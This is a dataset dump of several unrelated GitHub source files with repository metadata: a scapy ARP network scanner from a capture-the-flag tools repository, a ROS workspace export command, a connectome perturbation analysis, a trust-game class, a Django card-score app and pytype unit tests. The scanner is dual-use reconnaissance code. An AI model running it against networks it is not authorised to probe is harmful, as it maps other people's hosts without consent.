seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40057143195 | #!/usr/bin/env python3
import scapy.all as scapy
import argparse
from datetime import datetime
import sys
def ip():
parse = argparse.ArgumentParser()
parse.add_argument("-ip", dest="ip", help="Needs IP range /24")
parse.add_argument("-i", dest="interface", help='Needs interface')
parse.add_argument("-t", dest="time", help="Number of packets sent")
options= parse.parse_args()
if not options.ip:
parse.error('>> Needs ip address. Use -h for further details.')
elif not options.interface:
parse.error('>> Needs interface. Use -h for further details')
else:
return options
def scan(ip,interface,timer=5):
client_list=[]
while timer >0:
arp_request = scapy.ARP(pdst = ip)
broadcast= scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
ans = scapy.srp(arp_request_broadcast, timeout=1,iface=interface, verbose=False)[0]
for i in ans:
client_dic={'IP':i[1].psrc, 'MAC':i[1].hwsrc}
if client_dic not in client_list:
client_list.append(client_dic)
timer = timer -1
return client_list
def output(results_list):
print('','-'*100,'\n',"\t IP \t\t\tMac address",'\n','-'*100)
for i in results_list:
print('\t',i['IP'] + "\t\t" + i['MAC'])
options = ip()
print('\nScanning please wait:\n ')
start=datetime.now()
try:
if options.time:
scan_results=scan(options.ip, options.interface,int(options.time))
else:
scan_results=scan(options.ip, options.interface)
output(scan_results)
except KeyboardInterrupt:
print('User requested shut down:')
sys.exit()
stop=datetime.now()
duration= stop-start
print('-'*100,'\nScan Complete\n')
print('Scan duration: %s'%(duration))
| WMDA/ctf | tools/python_scripts/network_scanner.py | network_scanner.py | py | 1,853 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "scapy.all.ARP",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "scapy.all",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "scapy.all.Ether",
... |
22568917957 | from .workspace import get_workspace_location, get_workspace_state, resolve_this
from .cache import Cache
from .config import Config
from .resolver import find_dependees
from .ui import warning, fatal, show_conflicts
from .cmd_git import has_package_path, get_head_branch
from .util import iteritems, yaml_dump
from pygit2 import Repository
import os
def compute_git_subdir(name, used_paths):
index = 1
result = name
while result in used_paths:
index += 1
result = "%s-%d" % (name, index)
used_paths.add(result)
return result
def get_current_remote(path):
repo = Repository(os.path.join(path, ".git"))
if not repo.remotes:
warning("no remote found for Git repository in %s\n" % path)
return None, None
head_branch = get_head_branch(repo)
tracking_branch = head_branch.upstream if head_branch else None
remote_name = tracking_branch.remote_name if tracking_branch else None
remote = repo.remotes[remote_name] if remote_name else repo.remotes[0]
url = remote.url
version = None
if tracking_branch:
b = tracking_branch.branch_name
if b.startswith(remote_name + "/"):
b = b[len(remote_name) + 1:]
version = b
return url, version
def run(args):
wsdir = get_workspace_location(args.workspace)
config = Config(wsdir)
cache = Cache(wsdir)
if args.offline is None:
args.offline = config.get("offline_mode", False)
if args.offline:
warning("offline mode. Run 'rosrepo config --online' to disable\n")
ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline)
if args.this:
args.packages = resolve_this(wsdir, ws_state)
if args.all:
args.packages = ws_state.ws_packages.keys()
if not args.packages:
args.packages = config.get("default_build", []) + config.get("pinned_build", [])
protocol = args.protocol or config.get("git_default_transport", "ssh")
depends, _, conflicts = find_dependees(args.packages, ws_state)
show_conflicts(conflicts)
if conflicts:
fatal("cannot resolve dependencies\n")
paths = set()
remote_projects = set()
for name, pkg in iteritems(depends):
if hasattr(pkg, "workspace_path") and pkg.workspace_path is not None:
paths.add(pkg.workspace_path)
elif name in ws_state.remote_packages:
remote_projects.add(pkg.project)
ws_projects = set([p for p in ws_state.ws_projects if has_package_path(p, paths)])
other_git = set([g for g in ws_state.other_git if has_package_path(g, paths)])
yaml = []
for prj in ws_projects:
url, version = get_current_remote(os.path.join(wsdir, "src", prj.workspace_path))
if args.protocol:
url = prj.url[args.protocol]
packages = {}
for p in prj.packages:
if p.manifest.name in depends.keys():
packages[p.manifest.name] = p.project_path or "."
meta = {"packages": packages}
d = {"local-name": prj.workspace_path, "uri": url, "meta": meta}
if version:
d["version"] = version
yaml.append({"git": d})
for p in other_git:
url, version = get_current_remote(os.path.join(wsdir, "src", p))
d = {"local-name": p, "uri": url}
if version:
d["version"] = version
yaml.append({"git": d})
for prj in remote_projects:
packages = {}
for p in prj.packages:
if p.manifest.name in depends.keys():
packages[p.manifest.name] = p.project_path or "."
meta = {"packages": packages}
d = {"local-name": compute_git_subdir(prj.server_path, paths), "uri": prj.url[protocol], "version": prj.master_branch, "meta": meta}
yaml.append({"git": d})
if yaml:
args.output.write(yaml_dump(yaml, encoding="UTF-8", default_flow_style=False))
| fkie/rosrepo | src/rosrepo/cmd_export.py | cmd_export.py | py | 3,924 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "pygit2.Repository",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "ui.warning",
"line_nu... |
40211358205 | #%% [markdown]
# ## Preliminaries
#%%
from pkg.utils import set_warnings
set_warnings()
import time
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from giskard.utils import get_random_seed
from myst_nb import glue as default_glue
from pkg.data import load_network_palette, load_node_palette, load_unmatched
from pkg.io import savefig
from pkg.perturb import (
add_edges,
remove_edges,
shuffle_edges,
add_edges_subgraph,
remove_edges_subgraph,
shuffle_edges_subgraph,
)
from pkg.plot import set_theme
from pkg.stats import degree_test, erdos_renyi_test, rdpg_test, stochastic_block_test
from pkg.utils import get_seeds
from tqdm import tqdm
DISPLAY_FIGS = True
FILENAME = "perturbations_unmatched_deep_dive"
def gluefig(name, fig, **kwargs):
savefig(name, foldername=FILENAME, **kwargs)
glue(name, fig, prefix="fig")
if not DISPLAY_FIGS:
plt.close()
def glue(name, var, prefix=None):
savename = f"{FILENAME}-{name}"
if prefix is not None:
savename = prefix + ":" + savename
default_glue(savename, var, display=False)
t0 = time.time()
set_theme()
rng = np.random.default_rng(8888)
network_palette, NETWORK_KEY = load_network_palette()
node_palette, NODE_KEY = load_node_palette()
neutral_color = sns.color_palette("Set2")[2]
GROUP_KEY = "simple_group"
left_adj, left_nodes = load_unmatched("left")
right_adj, right_nodes = load_unmatched("right")
left_labels = left_nodes[GROUP_KEY].values
right_labels = right_nodes[GROUP_KEY].values
left_nodes["inds"] = range(len(left_nodes))
right_nodes["inds"] = range(len(right_nodes))
seeds = get_seeds(left_nodes, right_nodes)
#%%
random_state = np.random.default_rng(8888)
adj = right_adj
nodes = right_nodes
labels1 = right_labels
labels2 = right_labels
n_sims = 1
effect_sizes = np.linspace(0, 3000, 30).astype(int)
seeds = (seeds[1], seeds[1])
n_components = 8
#%%
KCs_nodes = nodes[nodes["simple_group"] == "KCs"]["inds"]
def remove_edges_KCs_KCs(adjacency, **kwargs):
return remove_edges_subgraph(adjacency, KCs_nodes, KCs_nodes, **kwargs)
#%%
rows = []
tests = {
"ER": erdos_renyi_test,
"SBM": stochastic_block_test,
"Degree": degree_test,
# "RDPG": rdpg_test,
# "RDPG-n":rdpg_test,
}
test_options = {
"ER": [{}],
"SBM": [{"labels1": labels1, "labels2": labels2, "combine_method": "min"}],
"Degree": [{}],
# "RDPG": [{"n_components": n_components, "seeds": seeds, "normalize_nodes": False}],
# "RDPG-n": [{"n_components": n_components, "seeds": seeds, "normalize_nodes": True}],
}
perturbations = {
"Remove edges (global)": remove_edges,
r"Remove edges (KCs $\rightarrow$ KCs)": remove_edges_KCs_KCs
# "Add edges (global)": add_edges,
# "Shuffle edges (global)": shuffle_edges,
}
n_runs = len(tests) * n_sims * len(effect_sizes)
for perturbation_name, perturb in perturbations.items():
for effect_size in tqdm(effect_sizes):
for sim in range(n_sims):
currtime = time.time()
seed = get_random_seed(random_state)
perturb_adj = perturb(adj, effect_size=effect_size, random_seed=seed)
perturb_elapsed = time.time() - currtime
for test_name, test in tests.items():
option_sets = test_options[test_name]
for options in option_sets:
currtime = time.time()
stat, pvalue, other = test(adj, perturb_adj, **options)
test_elapsed = time.time() - currtime
if test_name == "SBM":
uncorrected_pvalues = other["uncorrected_pvalues"]
other["KCs_pvalues"] = uncorrected_pvalues.loc["KCs", "KCs"]
row = {
"stat": stat,
"pvalue": pvalue,
"test": test_name,
"perturbation": perturbation_name,
"effect_size": effect_size,
"sim": sim,
"perturb_elapsed": perturb_elapsed,
"test_elapsed": test_elapsed,
**options,
**other,
}
rows.append(row)
results = pd.DataFrame(rows)
#%%
def check_power(pvalues, alpha=0.05):
n_significant = (pvalues <= alpha).sum()
power = (n_significant) / (len(pvalues))
return power
power_results = (
results.groupby(["test", "perturbation", "effect_size"]).mean().reset_index()
)
power = (
results.groupby(["test", "perturbation", "effect_size"])["pvalue"]
.agg(check_power)
.reset_index()
)
power.rename(columns=dict(pvalue="power"), inplace=True)
power_results["power"] = power["power"]
results["power_indicator"] = (results["pvalue"] < 0.05).astype(float)
results["power_indicator"] = results["power_indicator"] + np.random.normal(
0, 0.0025, size=len(results)
)
# %%
grid = sns.FacetGrid(
results,
col="perturbation",
col_wrap=min(3, len(perturbations)),
sharex=False,
sharey=False,
hue="test",
height=6,
)
grid.map_dataframe(sns.lineplot, x="effect_size", y="power_indicator")
grid.add_legend(title="Test")
grid.set_ylabels(r"Empirical power ($\alpha = 0.05$)")
grid.set_xlabels("Effect size")
grid.set_titles("{col_name}")
gluefig("power", grid.figure)
# %%
grid = sns.FacetGrid(
results,
col="perturbation",
col_wrap=min(3, len(perturbations)),
sharex=False,
sharey=False,
hue="test",
height=6,
)
grid.map_dataframe(sns.lineplot, x="effect_size", y="pvalue")
grid.add_legend(title="Test")
grid.set_ylabels(r"p-value")
grid.set_xlabels("Effect size")
grid.set_titles("{col_name}")
gluefig("pvalues", grid.figure)
#%%
subresults = results[results["perturbation"] == r"Remove edges (KCs $\rightarrow$ KCs)"]
subresults = subresults[subresults["test"] == "SBM"].copy()
fig, ax = plt.subplots(1, 1, figsize=(8, 6))
sns.lineplot(
data=subresults,
x="effect_size",
y="KCs_pvalues",
ax=ax,
label=r"KCs $\rightarrow$ KCs",
)
mean_pvalues = []
all_pvalues = []
for i in range(len(subresults)):
row = subresults.iloc[i]
vals = row["uncorrected_pvalues"].values
mean = np.nanmean(vals)
mean_pvalues.append(mean)
for j, pvalue in enumerate(vals.ravel()):
all_pvalues.append(
{"effect_size": row["effect_size"], "pvalue": pvalue, "j": j}
)
all_pvalues = pd.DataFrame(all_pvalues)
subresults["mean_pvalues"] = mean_pvalues
sns.lineplot(
data=subresults, x="effect_size", y="mean_pvalues", ax=ax, label="Mean p-value"
)
ax.set(ylabel="p-value", xlabel="Effect size (# edges removed)")
sns.lineplot(data=subresults, x="effect_size", y="pvalue", label="Fisher's combined")
ax.set_title(r"Remove edges (KCs $\rightarrow$ KCs)")
gluefig("split_pvalues", fig)
| neurodata/bilateral-connectome | misc_scripts/perturbations_unmatched_deep_dive.py | perturbations_unmatched_deep_dive.py | py | 6,901 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "pkg.utils.set_warnings",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pkg.io.savefig",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.close",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotl... |
6363206566 | from itertools import count
global_index = 1
global_bank_fee = 1
global_bank_win = 2
global_bank_lose = 3
class smartPlayer:
_ids = count(0)
def __init__(self, trustor_or_trustee, trust_coefficient, beta):
global global_bank_fee
global_bank_fee = beta
self.id = next(self._ids)
self.trustor = trustor_or_trustee
self.trustingCoefficient = trust_coefficient
self.memory = {}
self.currency = 0
def changeTrustStatus(self):
self.trustor = not self.trustor
def reciprocate(self, other):
alreadyIn = False
for key in self.memory.keys():
if key == other.id:
alreadyIn = True
if not alreadyIn:
self.memory[other.id] = self.trustingCoefficient
ans = self.memory[other.id] >= 0.66 * (1 + global_bank_fee)
if not ans and self.trustor:
self.currency -= global_bank_fee
return ans
def updateCurrency(self, win_lose):
if self.trustor:
if win_lose:
self.currency += global_bank_win
else:
self.currency -= global_bank_fee
else:
if win_lose:
self.currency += global_bank_win
else:
self.currency += global_bank_lose
def updateTrustStatus(self, other, result):
if result:
self.memory[other.id] *= self.trustingCoefficient
else:
self.memory[other.id] *= (1 - self.trustingCoefficient)
def memoryPrint(self):
repstr = []
i = 0
for pid, mem in self.memory.items():
repstr[i] = "Player ID: " + pid + ", Trusting Status: " + mem
return repstr
def __repr__(self):
return "Player ID: " + str(self.id) + "\n" + "Currency: " + str(
self.currency) + "\n" + "Self trusting coefficient: " + self.trustingCoefficient + "\n" + "Is truster? " + self.trustor
def __str__(self):
trustorStr = "No"
if self.trustor:
trustorStr = "Yes"
return "Player ID: " + str(self.id) + ", Currency: {0}".format(self.currency) + ", Self trusting coefficient: {0}".format(self.trustingCoefficient) + ", Is truster? " + trustorStr + "\n"
| snirsh/TrustGame | SmartPlayer.py | SmartPlayer.py | py | 2,264 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "itertools.count",
"line_number": 10,
"usage_type": "call"
}
] |
7086566402 | from django.shortcuts import render,redirect
from adm.models import *
def ViewInicio(request):
listJogos = Jogo.objects.select_related('Vencedora','Perdedora').all()
context = {
"listJogos":listJogos,
}
return render(request,"inicio.html",context)
def ViewCadastro(request):
if request.method == "POST":
listPessoas = request.POST.getlist('Jogador[]', None)
x=0
objJogo = Jogo()
for pessoa in listPessoas:
objPessoa = Pessoa()
objPessoa.Nome = pessoa
objPessoa.save()
if (x%2) == 0:
objEquipe = Equipe()
objPessoaAux = objPessoa
objEquipe.Nome = objPessoa
objEquipe.save()
objEquipe.Pessoas.add(objPessoa)
else:
objEquipe.Nome = str(objPessoa) + ' e ' + str(objPessoaAux)
objEquipe.save()
objEquipe.Pessoas.add(objPessoa)
objJogo.Nome += objEquipe.Nome
objJogo.save()
objJogo.Equipes.add(objEquipe)
x+=1
return redirect("InicioJogo", objJogo.id)
context = {
"Nome_pagina": "Cadastrar Jogo"
}
return render(request,"cadastro.html", context )
def ViewInicioJogo(request,idJogo):
objJogo = Jogo.objects.select_related('Vencedora','Perdedora').get(pk=idJogo)
listEquipes = objJogo.Equipes.all()
if request.method == "POST":
try:
ObjPartida = Partida.objects.select_related('Vencedora','Perdedora','Jogo').get(Jogo=objJogo,Fim=False)
except:
ObjPartida = Partida()
ObjPartida.Jogo = objJogo
ObjPartida.save()
listRodada=[]
for index, PtsCanastra in enumerate(request.POST.getlist('PtsCanastra[]')):
obj = {
"PtsCanastra": PtsCanastra,
"QtdCartas" :request.POST.getlist("QtdCartas[]", None)[index],
"QtdRed" : request.POST.getlist("QtdRed[]", None)[index],
"QtdBlack" : request.POST.getlist("QtdBlack[]", None)[index],
"Morto" : request.POST.getlist("Morto[]", None)[index],
}
listRodada.append(obj)
EquipeSelecionada=0
MaiorPontuacao = 0
for rodada in listRodada:
ObjRodada = Rodada()
ObjRodada.Partida = ObjPartida
ObjRodada.Equipe = listEquipes[EquipeSelecionada]
ObjRodada.PontosCanastra = rodada["PtsCanastra"]
ObjRodada.QtdCartas = rodada["QtdCartas"]
ObjRodada.QtdRed = rodada["QtdRed"]
ObjRodada.QtdBlack = rodada["QtdBlack"]
ObjRodada.Morto = rodada["Morto"]
ObjRodada.TotalPontos = 0
if int(ObjRodada.PontosCanastra) < 100:
ObjRodada.TotalPontos = (((int(ObjRodada.PontosCanastra) + (int(ObjRodada.QtdCartas)*10)) - (100*int(ObjRodada.QtdRed))) - (int(ObjRodada.QtdBlack)*100))
else:
ObjRodada.TotalPontos = (((int(ObjRodada.PontosCanastra) + (int(ObjRodada.QtdCartas)*10)) + (100*int(ObjRodada.QtdRed))) - (int(ObjRodada.QtdBlack)*100))
print("confere morto")
print(ObjRodada.Morto)
if ObjRodada.Morto == 'False':
print(f" A equipe {ObjRodada.Equipe} não pegou o morto")
ObjRodada.TotalPontos -= 100
ObjRodada.save()
try:
listRodadas = Rodada.objects.select_related('Equipe','Partida').filter(Partida=ObjPartida,Equipe=listEquipes[EquipeSelecionada])
totalpontos = 0
for rodada in listRodadas:
totalpontos += rodada.TotalPontos
if totalpontos >= 3000:
if MaiorPontuacao == 0:
MaiorPontuacao = totalpontos
if MaiorPontuacao <= totalpontos:
ObjPartida.Vencedora = listEquipes[EquipeSelecionada]
ObjPartida.Fim = True
for eq in listEquipes:
if eq != listEquipes[EquipeSelecionada]:
ObjPartida.Perdedora = eq
ObjPartida.save()
except:
listRodadas = []
EquipeSelecionada+=1
#contabilizar quem ganhou mais partidas.
ListPartida = Partida.objects.select_related('Vencedora','Perdedora','Jogo').filter(Jogo=objJogo)
listEquipe1 = []
listEquipe2 = []
print("estou aqui")
for partida in ListPartida:
if partida.Vencedora:
if partida.Vencedora == listEquipes[0]:
listEquipe1.append(partida)
else:
listEquipe2.append(partida)
if len(listEquipe1)>len(listEquipe2):
print(f'{listEquipes[0]} vencedora')
objJogo.Vencedora = listEquipes[0]
objJogo.Perdedora = listEquipes[1]
elif len(listEquipe2)>len(listEquipe1):
print(f'{listEquipes[1]} vencedora')
objJogo.Vencedora = listEquipes[1]
objJogo.Perdedora = listEquipes[0]
else:
print("empate")
objJogo.Vencedora = None
objJogo.Perdedora = None
objJogo.save()
return redirect("Resultado" , objJogo.id)
context = {
"objJogo":objJogo,
"listEquipes":listEquipes,
}
return render(request,"inicio_jogo.html",context)
def ViewResultado(request,idJogo):
objJogo = Jogo.objects.select_related('Vencedora','Perdedora').get(pk=idJogo)
try:
ListPartidas = Partida.objects.select_related('Vencedora','Perdedora','Jogo').filter(Jogo=objJogo)
ListPartidasRodadas = []
for Objpartida in ListPartidas:
listRodadas = Rodada.objects.select_related('Equipe','Partida').filter(Partida=Objpartida)
obj = {
"ObjPartida" : Objpartida,
"QtdRodadas" : len(listRodadas)
}
ListPartidasRodadas.append(obj)
except Partida.DoesNotExist:
ListPartidasRodadas = []
context = {
"objJogo":objJogo,
'ListPartidasRodadas': ListPartidasRodadas
}
return render(request,"resultados.html",context)
def ViewInfo(request,idPartida,idJogo):
objJogo = Jogo.objects.select_related('Vencedora','Perdedora').get(pk=idJogo)
ObjPartida = Partida.objects.select_related('Vencedora','Perdedora','Jogo').get(pk=idPartida)
try:
ListRodada = Rodada.objects.select_related('Equipe','Partida').filter(Partida=ObjPartida)
except:
ListRodada = []
context = {
"ObjPartida":ObjPartida,
"ListRodada":ListRodada,
"objJogo":objJogo,
}
return render(request,"mais_informacoes.html",context)
| michel110299/Administrador_tranca | adm/views.py | views.py | py | 7,068 | python | pt | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.redirect",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
"line_number": 45,
"usage_type": "call"
},
{
"api_nam... |
28891628391 | """Tests for traces.traces."""
import ast
import collections
import sys
import textwrap
from pytype import config
from pytype.pytd import pytd
from pytype.pytd import pytd_utils
from pytype.tests import test_utils
from pytype.tools.traces import traces
import unittest
_PYVER = sys.version_info[:2]
_BINMOD_OP = "BINARY_OP" if _PYVER >= (3, 11) else "BINARY_MODULO"
_CALLFUNC_OP = "CALL" if _PYVER >= (3, 11) else "CALL_FUNCTION"
_CALLMETH_OP = "CALL" if _PYVER >= (3, 11) else "CALL_METHOD"
_FORMAT_OP = "FORMAT_VALUE" if _PYVER >= (3, 11) else "BINARY_MODULO"
class _NotImplementedVisitor(traces.MatchAstVisitor):
def visit_Module(self, node):
self.match(node)
class _TestVisitor(traces.MatchAstVisitor):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.traces_by_node_type = collections.defaultdict(list)
def generic_visit(self, node):
try:
matches = self.match(node)
except NotImplementedError:
return
self.traces_by_node_type[node.__class__].extend(matches)
class TraceTest(unittest.TestCase):
"""Tests for traces.trace."""
def test_traces(self):
src = traces.trace("")
trace, = src.traces[0 if _PYVER >= (3, 11) else 1]
self.assertEqual(trace.op, "LOAD_CONST")
self.assertIsNone(trace.symbol)
pyval, = trace.types
self.assertEqual(pyval.name, "builtins.NoneType")
self.assertEqual(pyval.cls.name, "builtins.NoneType")
def test_options(self):
src = traces.trace("", config.Options.create("rumpelstiltskin"))
self.assertEqual(src.filename, "rumpelstiltskin")
def test_external_type(self):
with test_utils.Tempdir() as d:
pyi_path = d.create_file("foo.pyi", "class Foo: ...")
imports_info = d.create_file("imports_info", f"foo {pyi_path}")
src = traces.trace(
"import foo\nx = foo.Foo()",
config.Options.create(imports_map=imports_info))
trace, = (x for x in src.traces[2] if x.op == "STORE_NAME")
pyval, = trace.types
self.assertEqual(pyval.name, "foo.Foo")
self.assertEqual(pyval.cls.name, "foo.Foo")
def test_py3_class(self):
src = traces.trace(textwrap.dedent("""
class Foo:
pass
""").lstrip())
trace, = (x for x in src.traces[1] if x.op == "LOAD_BUILD_CLASS")
pyval, = trace.types
self.assertEqual(pyval.name, "typing.Callable")
def test_unknown(self):
# pytype represents unannotated function parameters as unknowns. Make sure
# unknowns don't appear in the traced types.
src = traces.trace("def f(x): return x")
trace = next(x for x in src.traces[1] if x.op == "LOAD_FAST")
pyval, = trace.types
self.assertIsInstance(pyval, pytd.AnythingType)
class MatchAstTestCase(unittest.TestCase):
"""Base class for testing traces.MatchAstVisitor."""
def _parse(self, text, options=None):
text = textwrap.dedent(text).lstrip()
return ast.parse(text), traces.trace(text, options)
def _get_traces(self, text, node_type, options=None):
module, src = self._parse(text, options)
v = _TestVisitor(src, ast)
v.visit(module)
return v.traces_by_node_type[node_type]
def assertTracesEqual(self, actual_traces, expected_traces):
self.assertEqual(len(actual_traces), len(expected_traces))
for trace, expected_trace in zip(actual_traces, expected_traces):
loc, trace = trace
expected_loc, expected_op, expected_symbol, expected_annots = (
expected_trace)
self.assertEqual(loc, expected_loc)
self.assertEqual(trace.op, expected_op)
self.assertEqual(trace.symbol, expected_symbol)
self.assertEqual(len(trace.types), len(expected_annots))
for t, annot in zip(trace.types, expected_annots):
self.assertEqual(pytd_utils.Print(t), annot)
class MatchAstVisitorTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisitor."""
def test_not_implemented(self):
module, src = self._parse("")
v = _NotImplementedVisitor(src, ast)
with self.assertRaises(NotImplementedError):
v.visit(module)
def test_import(self):
matches = self._get_traces("import os, sys as tzt", ast.Import)
self.assertTracesEqual(matches, [
((1, 7), "IMPORT_NAME", "os", ("module",)),
((1, 18), "STORE_NAME", "tzt", ("module",))])
def test_import_from(self):
matches = self._get_traces(
"from os import path as p, environ", ast.ImportFrom)
self.assertTracesEqual(matches, [
((1, 23), "STORE_NAME", "p", ("module",)),
((1, 26), "STORE_NAME", "environ", ("os._Environ[str]",))])
class MatchAttributeTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisit.match_Attribute."""
def test_basic(self):
matches = self._get_traces("""
x = 0
print(x.real)
""", ast.Attribute)
self.assertTracesEqual(matches, [
((2, 8), "LOAD_ATTR", "real", ("int", "int"))])
def test_multi(self):
matches = self._get_traces("""
class Foo:
real = True
x = 0
(Foo.real, x.real)
""", ast.Attribute)
# The second attribute is at the wrong location due to limitations of
# source.Code.get_attr_location(), but we can at least test that we get the
# right number of traces with the right types.
self.assertTracesEqual(matches, [
((4, 5), "LOAD_ATTR", "real", ("Type[Foo]", "bool")),
((4, 5), "LOAD_ATTR", "real", ("int", "int"))])
def test_property(self):
matches = self._get_traces("""
class Foo:
@property
def x(self):
return 42
v = Foo().x
""", ast.Attribute)
self.assertTracesEqual(matches, [
((5, 10), "LOAD_ATTR", "x", ("Foo", "int"))])
class MatchNameTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisitor.match_Name."""
def test_basic(self):
matches = self._get_traces("x = 42", ast.Name)
self.assertTracesEqual(matches, [((1, 0), "STORE_NAME", "x", ("int",))])
def test_multiline(self):
matches = self._get_traces("""
x = (1 +
2)
""", ast.Name)
self.assertTracesEqual(matches, [((1, 0), "STORE_NAME", "x", ("int",))])
def test_multiline_subscr(self):
matches = self._get_traces("""
x = [0]
x[0] = (1,
2)
""", ast.Name)
x_annot = "List[Union[int, Tuple[int, int]]]"
self.assertTracesEqual(matches, [((1, 0), "STORE_NAME", "x", (x_annot,)),
((2, 0), "LOAD_NAME", "x", (x_annot,))])
class MatchCallTest(MatchAstTestCase):
"""Tests for traces.MatchAstVisitor.match_Call."""
def test_basic(self):
matches = self._get_traces("""
def f(x):
return x + 1.0
f(42)
""", ast.Call)
self.assertTracesEqual(matches, [
((3, 0), _CALLFUNC_OP, "f", ("Callable[[Any], Any]", "float"))])
def test_chain(self):
matches = self._get_traces("""
class Foo:
def f(self, x):
return x
Foo().f(42)
""", ast.Call)
self.assertTracesEqual(matches, [
((4, 0), _CALLFUNC_OP, "Foo", ("Type[Foo]", "Foo")),
((4, 0), _CALLMETH_OP, "f", ("Callable[[Any], Any]", "int"))])
def test_multiple_bindings(self):
matches = self._get_traces("""
class Foo:
@staticmethod
def f(x):
return x
class Bar:
@staticmethod
def f(x):
return x + 1.0
f = Foo.f if __random__ else Bar.f
f(42)
""", ast.Call)
self.assertTracesEqual(matches, [
((10, 0), _CALLFUNC_OP, "f",
("Callable[[Any], Any]", "Union[int, float]"))])
def test_bad_call(self):
matches = self._get_traces("""
def f(): pass
f(42)
""", ast.Call)
self.assertTracesEqual(
matches, [((2, 0), _CALLFUNC_OP, "f", ("Callable[[], Any]", "Any"))])
def test_literal(self):
matches = self._get_traces("''.upper()", ast.Call)
self.assertTracesEqual(matches, [
((1, 0), _CALLMETH_OP, "upper", ("Callable[[], str]", "str"))])
def test_lookahead(self):
matches = self._get_traces("""
def f(x, y, z):
return x + y + z
f(
0,
1,
2,
)
""", ast.Call)
self.assertTracesEqual(matches, [
((3, 0), _CALLFUNC_OP, "f",
("Callable[[Any, Any, Any], Any]", "int"))])
class MatchConstantTest(MatchAstTestCase):
def test_num(self):
matches = self._get_traces("v = 42", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", 42, ("int",))])
def test_str(self):
matches = self._get_traces("v = 'hello'", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", "hello", ("str",))])
def test_unicode(self):
matches = self._get_traces("v = u'hello'", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", "hello", ("str",))])
def test_bytes(self):
matches = self._get_traces("v = b'hello'", ast.Constant)
self.assertTracesEqual(
matches, [((1, 4), "LOAD_CONST", b"hello", ("bytes",))])
def test_bool(self):
matches = self._get_traces("v = True", ast.Constant)
self.assertTracesEqual(matches, [((1, 4), "LOAD_CONST", True, ("bool",))])
def test_ellipsis(self):
matches = self._get_traces("v = ...", ast.Constant)
self.assertTracesEqual(
matches, [((1, 4), "LOAD_CONST", Ellipsis, ("ellipsis",))])
class MatchSubscriptTest(MatchAstTestCase):
def test_index(self):
matches = self._get_traces("""
v = "hello"
print(v[0])
""", ast.Subscript)
self.assertTracesEqual(
matches, [((2, 6), "BINARY_SUBSCR", "__getitem__", ("str",))])
def test_simple_slice(self):
matches = self._get_traces("""
v = "hello"
print(v[:-1])
""", ast.Subscript)
self.assertTracesEqual(
matches, [((2, 6), "BINARY_SUBSCR", "__getitem__", ("str",))])
def test_complex_slice(self):
matches = self._get_traces("""
v = "hello"
print(v[0:4:2])
""", ast.Subscript)
self.assertTracesEqual(
matches, [((2, 6), "BINARY_SUBSCR", "__getitem__", ("str",))])
class MatchBinOpTest(MatchAstTestCase):
def test_modulo(self):
matches = self._get_traces("""
v = "hello %s"
print(v % "world")
""", ast.BinOp)
self.assertTracesEqual(matches, [((2, 6), _BINMOD_OP, "__mod__", ("str",))])
def test_modulo_multiline_string(self):
matches = self._get_traces("""
('%s'
'%s' %
('hello',
'world'))
""", ast.BinOp)
self.assertTracesEqual(matches, [((1, 1), _BINMOD_OP, "__mod__", ("str",))])
def test_format_multiline_string(self):
matches = self._get_traces("""
('%s'
'%s' %
(__any_object__,
__any_object__))
""", ast.BinOp)
self.assertTracesEqual(
matches, [((1, 1), _FORMAT_OP, "__mod__", ("str",))])
class MatchLambdaTest(MatchAstTestCase):
def test_basic(self):
matches = self._get_traces("lambda x: x.upper()", ast.Lambda)
sym = "<lambda>"
self.assertTracesEqual(
matches, [((1, 0), "MAKE_FUNCTION", sym, ("Callable[[Any], Any]",))])
def test_function_locals(self):
matches = self._get_traces("""
def f():
return lambda x: x.upper()
""", ast.Lambda)
sym = "f.<locals>.<lambda>"
self.assertTracesEqual(
matches, [((2, 9), "MAKE_FUNCTION", sym, ("Callable[[Any], Any]",))])
def test_multiple_functions(self):
matches = self._get_traces("""
def f():
return (w for w in range(3)), lambda x: x.upper(), lambda y, z: (y, z)
""", ast.Lambda)
sym = "f.<locals>.<lambda>"
self.assertTracesEqual(
matches, [
((2, 32), "MAKE_FUNCTION", sym, ("Callable[[Any], Any]",)),
((2, 53), "MAKE_FUNCTION", sym, ("Callable[[Any, Any], Any]",))])
if __name__ == "__main__":
unittest.main()
| google/pytype | pytype/tools/traces/traces_test.py | traces_test.py | py | 11,794 | python | en | code | 4,405 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pytype.tools.traces.traces.MatchAstVisitor",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "pytype.tools.traces.traces",
"line_number": 22,
"usage_type": "name... |
